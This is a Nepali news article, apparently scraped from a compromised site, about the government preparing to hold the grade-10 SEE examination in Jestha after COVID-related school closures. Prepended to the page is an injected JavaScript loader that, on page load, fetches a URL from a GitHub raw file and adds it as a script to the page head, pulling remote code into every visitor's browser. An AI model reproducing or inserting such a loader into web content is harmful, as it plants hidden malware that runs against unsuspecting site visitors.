;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); जेठमा एसइई परीक्षा – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
देश/प्रदेश

जेठमा एसइई परीक्षा

फागुन १०,

काठमाडौं । सरकारले कक्षा १० को परीक्षा जेठको पहिलो सातामा सन्चालन गर्ने तयारी गरिएको छ। कोरोना भाइरस संक्रमणले शैक्षिक गतिविधिमा लामो समय बन्द भएका कारण चैत्र महिनामा संचालन हुनु पर्ने परीक्षा जेठ महिनामा गर्ने तयारी गरेको जनाएको छ ।

त्यसको लागि प्रश्नपत्र तयार गर्न थालिएको स्रोतले बताएको छ । लामो समय बन्द भएका विद्यालयहरु संचालन भैरहेका छन् । कतिपए शिक्षा बिधहरुले भने शैक्षिक शत्र असार सम्मलम्ब्याउनु पर्ने बताउदै आएका बेला सरकारले भने परीक्ष जेठमा संचालन गर्ने तयारी सरु गरेको हो ।

फेसबुक प्रतिक्रियाहरु